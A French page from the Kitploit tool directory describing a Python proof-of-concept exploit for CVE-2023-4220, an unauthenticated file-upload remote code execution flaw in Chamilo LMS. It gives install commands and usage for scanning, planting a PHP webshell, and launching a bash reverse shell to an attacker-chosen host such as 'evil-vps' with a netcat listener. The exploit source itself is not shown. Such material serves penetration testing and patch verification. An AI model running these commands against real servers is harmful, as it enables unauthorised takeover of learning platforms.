Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
chamilo-lms-unauthenticated-big-upload-rce-poc — Ceci est un script écrit en Python qui permet l'exploitation de la faille de sécurité du logiciel LMS Chamilo décrite dans CVE-2023-4220 | Kitploit
Outils/GitHubGitHub/m3m0o/chamilo-lms-unauthenticated-big-upload-rce-poc
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionRed TeamingDéveloppement de Charges Utiles
GitHubm3m0o/chamilo-lms-unauthenticated-big-upload-rce-poc

chamilo-lms-unauthenticated-big-upload-rce-poc

Ceci est un script écrit en Python qui permet l'exploitation de la faille de sécurité du logiciel LMS Chamilo décrite dans CVE-2023-4220

Voir le dépôt
2il y a 2 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Chamilo LMS - PoC RCE de téléversement de gros fichier non authentifié

Ceci est un script écrit en Python qui permet d'exploiter la faille de sécurité du logiciel Chamilo LMS décrite dans CVE-2023-4220. Le système est vulnérable dans les versions antérieures à 1.11.24.

Utilisation

Clonez le dépôt sur votre machine et installez les dépendances à l'aide de pip (il est recommandé d'utiliser virtualenv pour créer un environnement afin de séparer ces installations des installations globales)

root@kitploit:~
git clone https://github.com/m3m0o/chamilo-lms-unauthenticated-big-upload-rce-poc
cd chamilo-lms-unauthenticated-big-upload-rce-poc
pip install -r requirements.txt

Le script nécessite l'URL cible avec le chemin racine de Chamilo (par exemple http://example.com/chamilo, http://example.com ou http://chamilo.example.com) et une action à effectuer (il y en a trois disponibles : scan, webshell et revshell).

Scan

Cette action vérifie si la cible est vulnérable en tentant d'accéder au point de terminaison .

/main/inc/lib/javascript/bigupload/files/
root@kitploit:~
python3 main.py -u http://example.com/chamilo -a scan

scan-demo

Webshell

Cette action crée un fichier webshell PHP dans le point de terminaison vulnérable.

root@kitploit:~
python3 main.py -u http://example.com/chamilo -a webshell

webshell-demo

Revshell

Cette action crée et exécute un fichier reverse shell bash. Pour ce faire, un webshell sera d'abord créé en utilisant la même méthode que celle de l'action précédente. Ensuite, quelques commandes seront exécutées pour créer et exécuter le fichier bash. Assurez-vous d'être à l'écoute sur le port que vous avez défini avec nc ou tout autre utilitaire afin de réellement recevoir la connexion inverse. De plus, l'hôte peut être une adresse IPv4 interne/publique valide (comme 172.17.1.4 ou 186.227.4.31) ou le domaine que vous avez enregistré (comme evil-vps.domainreg.net)

root@kitploit:~
python3 main.py -u http://example.com/chamilo -a revshell

revshell-demo

Remarque : Bientôt, j'ajouterai une option de payload Windows pour les hôtes Windows

Références

(CVE-2023-4220) Chamilo LMS - Exécution de code à distance via téléversement de gros fichier non authentifié

Télécharger l’outil